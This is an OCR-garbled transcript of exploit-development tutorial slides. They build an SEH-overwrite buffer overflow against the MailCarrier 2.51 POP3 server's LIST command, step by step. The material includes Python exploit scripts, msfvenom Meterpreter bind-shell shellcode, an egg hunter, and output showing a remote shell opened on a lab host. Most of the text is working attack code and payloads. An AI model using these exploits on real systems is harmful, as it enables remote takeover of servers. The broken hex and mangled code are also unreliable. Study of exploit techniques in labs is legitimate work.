:-/hacktobasics/SEH# msf-pattern create -l 10000 
Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9AbO0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9ACOACIAC2AC3AC4ACSAC6AC7AC8AC9AdOAd1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9| 
AfOAflAf2Af3AfAAfSAfGAf7AfBAf9AgOAg1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah 1A4h2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai 1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj 7Aj8Aj9| 
AkOAK1AK2AK3Ak4AKSAK6AK7AK8AK9A10Al1Al12A13Al4Al15A16A17A18Al9Am0Am1Am2Am3Am4Am5Am6Am7 Am8Am9AnOAn 1An2An3An4An5An6An7An8An9A00A01A02A03A04A05A06A07A08A09 
Ap9Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar9Ar1lAr2Ar3Ar4ArSAr6Ar7AT8AT9ASOAS 1AS2AS3AS4ASSASGAS7ASBAS9AtOAt TAt2At3AtAAtSAtGAt7AtBAtO| 
Au9Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av 1Av2AV3AV4AV5AV6AV7AV8AV9AWOAW1AW2AW3AWAAWSAW6AW7 AWBAW9AXOAX 1AX2AX3AX4AXSAX6AX7AX8AX9AyOAy LAy2Ay3Ay 4Ay SAy 6Ay7AyB8Ay9| 
AZOAZ1AZ2AZ3AZ4AZ5AZ6AZ7AZ8AZ9Ba0BalBa2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4BbS5Bb6Bb7Bb8Bb9BcOBc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9BdoOBd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9 
Be0BelBe2Be3Be4Be5Be6Be7Be8Be9BfoBfl1Bf2Bf3Bf4BfS5Bf6Bf7Bf8Bf9BgoBglBg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bho0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0BilBi2Bi3Bi4BiS5Bi6Bi7Bi8Bi9 
Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj 9BkOBK1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bll1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9BmOBm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9BnOBn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9 
Bo0Bo1Bo2B0o3Bo4B05B06B07B08B09Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9BrOBr1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9 
BtOBt IBt2Bt 3Bt4Bt5Bt6Bt 7Bt8Bt 9BuOBU1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9BVvOBv 1Bv2Bv3Bv4BV5BV6Bv7BVv8Bv9BwOBW1BW2BwW3BwA4Bw5 Bw6Bw7 BW8BW9BXOBX1BX2BX3BX4BX5BX6BXx7BX8Bx9| 
ByOBy1By2By3By4By5By6By7By8By9Bz0Bz 1B22Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0CalCa2Ca3Ca4Ca5Ca6Ca7Ca8Ca9CbOCb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9CcOCclCc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9| 
decdicd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0CelCe2Ce3Ce4Ce5Ce6Ce7Ce8Ce9CfOCf 1Cf 2Cf 3CfACfSCf6Cf7Cf8Cf9CgO0Cgl1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9ChO8Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9 

i0CilCi2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj 9CKOCK1CK2CK3CKk4CK5CK6Ck7CK8CK9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9CmOCmlCm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9| 
n6CniCn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co8Co1Co2Co3Co4Co5Co6Co7Co8Co9CpO8Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq80Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9CroCr1Cr2Cr3Cr4Cr5Cr6Cr7Cra8acr9| 
S0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9CtOCt1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9CuOCulCu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9CwOCw1Cw2Cw3Cw4Cw5Cw6Cw7 Cw8Cw9| 
X0CX1CX2CX3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9| 
DcODc1DC2Dc3Dc4Dc5Dc6Dc7Dc8Dc9DdODd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df Df 1Df 2Df 3Df 4Df 5Df6Df 7Df 8Df 9DgODg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9| 
DhoDh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9DiODilDi2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj 9DKODK1Dk2DKk3Dk4Dk5DK6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7D18Dl9| 
Dm6Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9D00Do1D02D03D04D05D06D07D08Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq9Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9| 
DreDriDr2DraDr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9DtODt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9DuODu1Du2Du3Du4DuSDu6Du7Du8Du9DvODv 1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9| 
DwODw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9DXO0DX1Dx2DXx3Dx4Dx5Dx6Dx7Dx8Dx9DyODy 1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz 1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0EalEa2Ea3Ea4Ea5Ea6Ea7Ea8BEa9| 
IEbOEb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9ECOECIEC2EC3ECAECSEC6EC7EC8EC9EdOEd1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9EeOEe1Ee2bEe3Ee4Ee5Ee6Ee7Ee8Ee9EfOEf LEIT 2ET3bEf AEf SETGEf 7Ef 8Ef9 
IEgOEg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9EhOEh1Eh2Eh3Eh4EhSEh6Eh7Eh8Eh9EiOFilEi2Ei3Ei4EiSEi6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej 5Ej 6Ej 7Ej8Ej 9EKOEK1EK2EKk3EK4EKS5EKGEK7EKB8EKk9 
|ELOELIEl2El3El4ELSEL6El7El8El9EmOEm1Em2Em3Em4Em5Em6Em7Em8Em9EnOEn1En2bEn3En4En5En6En7En8En9Eo0E01E02E03E04E05E06E07E08E09EpOEp1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9 
|EqOEq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9ErOErlEr2Er3Er4Er5Er6Er7Er8Er9ESOESIES2ES3ESA4ESSES6ES7ESBESOEtOEt1Et2Et3Et4Et5EtG6Et7Et8Et9EuOEulEu2Eu3Eu4EuSEu6Eu7Eu8Eu9 
EVOEv IEV2EV3EV4EVS5EV6EV7EVB8EV9EWOEW1EW2EW3EWAEWSEWGEW7EW8EWOEXOEX1EX2EX3EX4EXSEX6EX7EX8EX9EyOEy 1Ey2Ey3Ey4EySEyGEy7Ey8Ey9EZOEZ 1EZ2EZ3EZ4EZ5EZ6EZ7EZ8EZ9| 
lFaoFalFa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9FbOFblFb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9FcOFc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9FdOFdlFd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9FeO0FelFe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9 
IFforf1Ff2Ff3FfAFfSFfO6Ff7Ff8Ff9FgOFglFg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9FhOFhlFh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9FioFilFi2Fi3Fi4FiSFi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9 
IFKOFK1FK2FK3FKA4FKSFk6Fk7FK8FK9FlOFllFl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9FmOFmlFm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9FnOFnlFn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2F03Fo4F05Fo6F07FO08F09| 
lFpOFplFp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9FrOFrlFr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9FsOFslFs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9FtOFt1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9| 
lFuoFulFu2Fu3Fu4FuSFu6Fu7Fu8Fu9FvOFv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9FwOFwlFw2Fw3FwA4FWSFW6Fw7FwWw8FW9FXOFXIFX2FX3FX4FXSFX6FX7FX8FX9FyOFy1Fy2Fy3Fy4FySFy6Fy7Fy8Fy9 
lFzZOFz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0GalGa2Ga3Ga4Ga5Ga6Ga7Ga8Ga9GbO0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9 
PATES PES pei tec diei SEET 
mo 


In the same way as the previous exploit, we use msf to create a unique pattern with 10000 
bytes. 


[EL 


GNU nano 3.2 seh2.py 


import sys 
import socket 
import time 


buffer = "Aa0AalAa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9ACOACIAC2ACSACAACS 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME\r\n" 

s.send('USER test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + '\r\n') 

print s.recv(1024) 

s.send('"QUIT\r\n') 

s.close() 

time.sleep(1) 

print "[*] Done, but if you get here the exploit failed!" 


Python script with the pattern. 


SEH exploitation 


Address |SE handler 


:-/hacktobasics/SEH# msf-pattern offset -q 79483978 
[*] Exact match at offset 6178 
:-/hacktobasics/SEH# B 


SEH chain shows overwrite, we then match that with msf-pattern offset to 6178 bytes. 


GNU nano 3.2 seh3-SEH-overwrite.py 


buffer = "A" * 6174 + "B" + 4 + "C" * 4 + "D" + (10000-6174-4-4) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect-s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME\r\n" 

s.send('USER test' + ‘\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + ‘\r\n') 

print s.recv(1024) 


SEH exploitation 


Address |SE handler 


SEH Chain now shows we control nseh and seh accordingly. 


SEH exploitation 


Tw vv www 
(p roe crea ms PANI 


nas ss... 


# # 
# # 1 
# # 1 
# # 
# # 1 
# LIE 
E LIE 
t # 1 
# LIE 
# # 1 
# iggi 
# LIE 
# # 1 
# # 1 
# LIE 
Li # 1 
# # 1 
# # 1 
# # 1 
# # 1 
, 


HEIN 


D 
Only the fir 


[+] This mona.py 


Imona seh 


GNU nano 3.2 sehd-ppr.py 


= "G" * 4 
"\xOc\x11\x0d\x1b" 
= "A" * 6174 + nseh + seh + "D" * (10000-6174-4-4) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST comma 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME\r\n" 

s .send( "USER test' + 'Yrin') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + ‘\r\n') 

print s.recv(1024) 


SEH exploitation 


[03:11:29] Breakpoint at msjet40.1B0D110C 


m = 


16601160 

1BØD11ØE 

1BØ01111 - A EAX, DWORD PTR SS: [ESP+4] 
1B6D1115 FF 

1B6D111A 

16001110 

1BØDI 1 

1B6D11 

1BØDI 1 

16001127 


1B6D1144 

16601149 

1B8D114R SS: CEBP+8 
1B6D114D K 

18001152 í ,EBX 
16601154 = 

18001159 

18600115F 

18901161 


SEH exploitation 


11 
4444441B 


SEH exploitation 


AC 11 

ØD 16444444 
44 

44 


GNU nano 3.2 


seh6-ppr-nseh-seh-nops.py 


import sys 
import socket 
import time 


“\xeb\x12\x90\x90" 
"\xOc\x11\x0d\x1b" 
"Ax90" * 20 
"A" * 6174 + nseh + seh + nops + "D" + (10000-6174-4-4-10) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

connect-s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME V rn" 

s.send('USER test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD r^n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + '\r\n') 

print s.recv(1024) 


SEH exploitation 


SEH exploitation 


:~/hacktobasics/SEH# msfvenom -a x86 --platform windows -p windows/meterpreter/bind tcp LPORT=443 -e x86/alpha mixed -b "\x@0\xd5\x0a\xOd\x| 
lalx@3" -f c 
Found 1 compatible encoders 
Attempting to encode payload with 1 iterations of x86/alpha mixed 
x86/alpha mixed succeeded with size 680 (iteration= 
x86/alpha mixed chosen with final size 680 
Payload size: 680 bytes 
Final size of c file: 2882 bytes 
unsigned char buf[] = 
"\X89\xe1\xd9\ xF6\xd9\ x71\xF4\x5e\ x56\x59\ x49 xX49\ x49\ x49\ x49" 
"N X49\ X49\ X49\ X49\ X49\ X43\X43\ X43\ X43\X43\ X43\X37\X51\x5a\x6a" 
"\X41\x58\x50\ x30\xX41\ x30\ xX41\ x6D\ X41\ X41\ x51\X32\ KAES EM x32" 
"\X42\ X42\ X30\ X42\ EA X41\ X42\ X58\ X50\ X38\ X41\ X42\X75\ x4a\ x49" 
"\xX49\ x6C\x5a\x48\ x6e\ x62\ X45\ X50\X75\xX50\ x33\x30\xX31\x70\x6d" 
"\X59\x4d\x35\X75\xX61\ x49\ x50\ x31\ X74\x4C\ X4bV X32\ X70\X76\x50" 
"\X6C\X4b\x56\ X32\ x46 \ x6C\ X6C\ X4b\ X56\ X32\ X36\X74\ x6E\ KODY x42" 
MAX52\X55\X78\X76\x6f\x4d\x67\x43\x7a\x46\x46\X66\X51\X6b\x4f" 
"\X4E\ X4C\ X55\ X6C\ X63\X51\X43\ X40\X74\ X42\ X36\ X4C\ X61\ X30\ x49" 
"\X51\x68\x4 F\ x76\ x6d\ x53\x31\x4b\ x77\x38\ x62\X39\ x62\xX36\ x32" 
"\X71\X47\X4C\ X4b\ X46\ X32\ X42\ X30\ X4C\ X4D\ X51\X5a\X77\X4C\x4e" 
"\ X6D\X72\xX6C\X42\X31\x31\x68\ x4a\ X43\ X30\ X48\ X47\X71\x58\x51" 
"\X43\x61\x6e\ x6b\ x66\ X39\X77\ X50\X77\X71\X38\xX53\x6C\ x4b\ x37" 
"\X39\X42\xX38\ x68\ X63\ X34\ X7a\ X71\xX59\ X4C\ X4D\ X50\ X34\X4C\ x4b" 
" \X73\X31\x6D\ x66\X45\ X61\ X49\ x6 F\ X4C\ X6C\ X59\X51\ X7a\ x6 F\ x36" 
"\ X6d\xX43\X31\X78\X47\ X44\ X78\ X69\ X70\ X53\ x45 \ x68\ X76\X57\x73" 
"\X71\x6d\xX39\ EA x4b\ x7 1\ x6d\ X77\X54\ X54\X35\ X39\X74\ x51" 
"\X48\ x6C\xX4D\ X43\ x68\ X57\X54\ X53\ X31\X59\ X43\X55\ X36\xX4e\ x6b" 
"\X64\ X4C\X72\ x6b\ X4€\ X6D\ X76\ X38\ X35\ X4C\ X76\X61\ X58\X53\x4c" 
"\X4D\xX34\xX44\ x4e\ x6b\ X63\ X31\ X58\xX50\X4C\ xX49\ X51\ X54\X74\ x64" 
"\X35\X74\x61\ x4b\x53\ x6b\ x70\ x61\ x30\x59\ x50\x5a\ x63\x61\x59" 
"\X6F\ X49\ X70\ X51\ x4 F\ X51\ x4 F\ X62\ X7a\ X6C\ X4D\ X32\ X32\X7a\x4b" 
"\ x6E\ x6d\ KIIN x6d\x72\ X48\ X76\ X53\ X47\ X42\ X77\ X70\X77\X70\ x62" 
"Xx48NX44N X37\X43\X43\X35\ x62\xX51\X4F\X72\x74\x50\ x68\x50\x4c" 
"\X33\X47\X34\ x66\ X66 \ x67 \ X6D\ x4 fV X38\ x55\ x68\ X38\ x6a\x30\ x56" 
"\X61\X67\X70\xX55\x50\ X37\X59\ X49\ X54\ X31\ X44\ X42\ X70\ X43\ x58" 
"\X77\xX59\ x6 F\ X70\ X70\ x6b\ X73\ X30\ X79\ x6 F\ x6a\X75\xX53\x5a\x54" 
"\x4b\ x63\xX69\ x42\xX70\ x48\ x62\ x69\ X6d\X73\ x5a\x45\x51\x70\x6a" 
" \X63\X32\xX62\ X48\X49\ X7a\ X36\ KOTI X69\ X4 F\ X79\X70\ X39\ X6F\ x69" 


Using msfvenom, we generate our bind shell once again. 


We add this to our final exploit(1/2). 


GNU nano 3.2 seh7-nops-shellcode.py 


M\x6f\x6e\x35\x4d\x53\x68\x78\x65\x50\x31\x6e\x46\x4d\x6e\x6b" 
"\x56\x56\x33\x5a\x31\x50\x63\x58\x35\x50\x46\x70\x35\x50\x65" 

"\ x50\x33\x66\x62\x4a\x37\x70\xX73\xX58\xX72\X78\X39\x34\x71\x43" 

"\ x6a\x45\x49\x6F\x68\x55\x6F\x63\x61\x43\x42\x4a\x35\x50\x71" 
M\x46\x31\x43\x70\x57\x75\Xx38\x73\x32\x6a\x79\X39\Xx58\x43\x6f" 

"\ x59\x6f\x4a\x75\x6e\x63\x59\x68\x77\x70\x33\x4e\x45\x57\x37" 
"\X71\x58\xX43\x44\x69\x39\x56\x72\x55\x4a\x49\x5a\x63\x4d\x6b" 
"\x48\x70\x6F\x45\x69\x32\x33\x66\x62\x4a\x33\x30\x72\xX73\x59" 

"\ x6F\x6e\x35\x41\x41") 

buffer = "A" * 6174 + nseh + seh + nops + shellcode + "D" * (10000-6174-4-4-20-(len(shellcode))) 


print "[+] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
s = socket.socket(socket.AF INET, socket.SOCK STREAM) 
connect=s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME\r\n" 

E.send('USER test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + ‘\r\n') 

print s.recv(1024) 

s.send('QUIT\r\n') 


SEH exploitation 


:-/hacktobasics/SEH# python seh7-nops-shellcode.py 
MailCarrier 2.51 POP3 Buffer Overflow in LIST command 


Sending pwnage buffer: with 10000 bytes... 
<2764.1556619970@>, TABS Lab POP3 server ready. 


Sending USERNAME 
test is known here. 


Sending PASSWORD 


Welcome! 0 messages (0 bytes) 


Sending Evil LIST buffer 


a 
A 


lTemtwicPEbz I Ts 
SS = ol gisters (FPU) 
F 999 4 


D$ CE «x p| 


Mincio | . | 


EC 
DWORD PTR 


NULL 
d "443" 


ø.0.0.0:0 LISTENING ERROR 10 PENDING (99 
NB, H 0,6E,6) 


C:\Documents and Settings\test> 


RETURN to po 


SEH exploitation 


sf exploit( ) > show options 


odule options (exploit/multi/handler) 


Name Current Setting Reguired Description 


Payload options (windows/meterpreter/bind tcp): 
Name Current Setting Required Description 
Exit technigue (Accepted: '', seh, thread, process, none) 
LPORT 443 The listen port 
RHOST 192.168.0.150 The target address 
Exploit target: 
Id Name 


Wildcard Target 


exploit( ) » run 


Started bind TCP handler against 192.168.0.150:443 
Sending stage (179779 bytes) to 192.168.0.150 
Meterpreter session 1 opened (192.168.0.240:36585 -> 192.168.0.150:443) at 2019-04-30 12:27:28 +0200 


Egg hunters 


Playing with limited buffer space can be fun! 


An egg hunter is a small piece of shellcode that will search memory for a specific 
pattern. Once this is found, it will then execute the full shellcode in a larger area of 
available buffer space(sometimes done via another stored variable). 


We will expand upon the SEH exploit from the previous example, with the use of a egg 
hunter to find our shellcode. 


IEL 
-h kO ma 


Additional information: https://www.corelan.be/index.php/2010/01/09/ex loit-writing-tutorial- art-8-win32-egg-huntin 


GNU nano 3.2 egghunterl.py 


sys 
socket 
time 


"\xeb\x12\x90\x90" 
\xOc\x11\x0d\x1b" 
= "\x90" + 20 


buffer = "A" + 6174 + nseh + seh + nops + "D" + (10000-6174-4-4-20) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
connect=s.connect(("192.168.0.150", 110)) 
print s.recv(1024) 
"[*] Sending USERNAME\r\n" 
s.send('USER test' + '\r\n') 
print s.recv(1024) 
print "[*] Sending PASSWORD\r\n" 
s.send('PASS test' + '\r\n') 
print s.recv(1024) 
print "[*] Sending Evil LIST buffer\r\n" 
s.send('LIST ' + buffer + ‘\r\n') 
print s.recv(1024) 
s.send('QUIT\r\n') 
s.close() 
time.sleep(1) 
print "[*] Done, but if you get here the exploit failed!" 


We start with our skeleton Python script, which uses nseh, seh and nops(no shellcode this time). 


Egg hunters 


Egg hunters 


:~/hacktobasics/egghunter# msf-egghunter -b "Xx00" -e WOOT -f c 
unsigned char buf[] = 
"\x66\x81\xca\xff\xOf\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" 


"\x74\xef\xb8\x57\x4Ff\x4f\x54\x89\ xd7\xaf\x75\xea\xaf\x75\xe7" 
"AxffNxe7"; 


:-/hacktobasics/egghunter# l 


Using msf-egghunter to generate our egghunter, with x00 as the only bad char, tag of WOOT. 


GNU nano 3.2 egghunter3-WOOTWOOT-egg.py 


sys 
socket 
time 


"\xeb\x12\x90\x90" 

seh = "\xOc\x11\x0d\x1b" 
= "\x90" * 20 
r = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" 

"\x74\xef\xb8\x57\x4f\x4f\x54\x89\xd7\xaf\x75\xea\xaf\x75\xe7" 
"\xff\xe7") 
leggy = "WOOTWOOT" 
buffer = "A" * 3000 + eggy + "A" * 3174 + nseh + seh + nops + egghunter + "D" * (10000-6174-4-4-20-32) 


print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n" 

print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer) 
socket.socket(socket.AF INET, socket.SOCK STREAM) 

connect-s.connect(("192.168.0.150", 110)) 

print s.recv(1024) 

print "[*] Sending USERNAME\r\n" 

s.send('USER test" + '\r\n') 

print s.recv(1024) 

print "[*] Sending PASSWORD\r\n" 

s.send('PASS test' + '\r\n') 

print s.recv(1024) 

print "[*] Sending Evil LIST buffer\r\n" 

s.send('LIST ' + buffer + '\r\n') 

print s.recv(1024) 

s.send('QUIT\r\n') 

s.close() 


T Mand DE linan 1 


Adding the egghunter to our code, also including the WOOTWOOT tag just after initial "A" buffer 


[EL 


H for Hire 


Egg hunters 


:-/hacktobasics/egghunter# python egghunter2-WOOT-egg.py 
MailCarrier 2.51 POP3 Buffer Overflow in LIST command 


Sending pwnage buffer: with 10000 bytes... 
<1752.1556623357@>, TABS Lab POP3 server ready. 


Sending USERNAME 
test is known here. 


Sending PASSWORD 


Welcome! © messages (0 bytes) 


Sending Evil LIST buffer 


Egg hunters 


c] M x 


Address |Size Owner Section [Contains Typel Access | Initial| Mapped as 


Addres 


Egg hunters 


:~/hacktobasics/egghunter# msfvenom -a x86 --platform windows -p windows/meterpreter/bind tcp LPORT=443 -e x86/alpha mixed -b "\x00\xd5\xOal 
Axed\xla\x03" -f c 
Found 1 compatible encoders 
Attempting to encode payload with 1 iterations of x86/alpha mixed 
86/alpha mixed succeeded with size 680 (iteration=0) 
Ix86/alpha mixed chosen with final size 680 
Payload size: 680 bytes 
Final size of c file: 2882 bytes 
unsigned char buf[] = 
"Ax89\xe5\xda\xc2\xd9\x75\xf4\X5F\X57\x59\x49\x49\x49\x49\x49" 
M\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\X51\x5a\x6a" 
"\X41\x58\x50\x30\X41\x30\ x41\ x6b\xX41\x41\x51\x32\x41\x42\x32" 
"\X42\xX42\x30\X42\X42\X41\ x42\xX58\X50\ X38\ X41\X42\xX75\x4a\ x49" 
" \X79\X6C\X38\xX68\ X4C\ xX42\ X53\X30\X67\X70\X43\X30\xX45\x30\x6cC" 
"\X49\x69\x75\x50\x31\x69\ x50\x70\ x64\ x6e\ xX6D\x70\x50\x70\x30" 
"\X4C\X4b\ x50\xX52\ X36\ X6C\ X4C\ X4b\ X30\ X52\ X47\ X64\ KA CN X4b\ X42" 
"\X52\X77\X58\X74\ x4 F\ x6d\ x67\ X50\ x4a\ X66\ X46N X66\ x51\x4b\x4F" 
MAX4C\X6C\X47\X4C\X71\X71\X73\X4C\X45\X52\X44\X6C\X65\x70\x49" 
"\x51\x6a\x6F\x44\x4d\x56\ x61\xX49\x57\xX38\ x62\X38\X72\xX36\x3. 
MAX31\x47\x4c\x4b\x66\x32\x62\x30\x4e\x6b\x70\x4a\x37\x4c\x6e 
"\ X6D\X42\x6C\X34\X51\X72\ x58\X59\X73\xX61\ x58\x56\x61\x4e\x31" 
"\X63\x61\x6e\x6D\xX50\xX59\ X45\xX70\X43\xX31\xX39\X43\ x4C\ X4b\ x47" 
"\X39\xX55\x48\x5a\x43\x54\x7a\X47\x39\xX4C\ X4b\ x67\ x44\ x6e\ x6b" 
"\X65\x51\x4a\x76\x50\x31\x59\ x6f\x4e\x4c\x4F\xX31\x78\X4F\ x76" 
"\xX6d\X35\x51\x38\xX47\x54\ xX78\ X69\ X70\ X63\ X45\ x6a\x56\X75\x53" 
"\X33\xX4d\x69\ x68\ X37\x4b\ x73\xX4d\ xX36\xX44\ X33\X45\ X79\X74\ x33" 
MAX68\X4C\X4b\X36\X38\Xx37\X54\X43\X31\X6b\X63\X53\X56\X6C\x4b" 
"\X3B4\X4C\X70\x4b\ x4e\ x6D\ X32\ X78\ X47\ X6C\ X55\X51\X79\X43\x6C" 
"\X4D\X75\x54\ x6e\ X6D\X35\ X51\x4e\X30\ X4C\ X49\X71\X54\X46\ x44" 
"\X55\X74\x53\x6b\xX73\x6b\ x43\ x5 1\x66\x39\ x43\ x6a\x53\x61\x4b" 
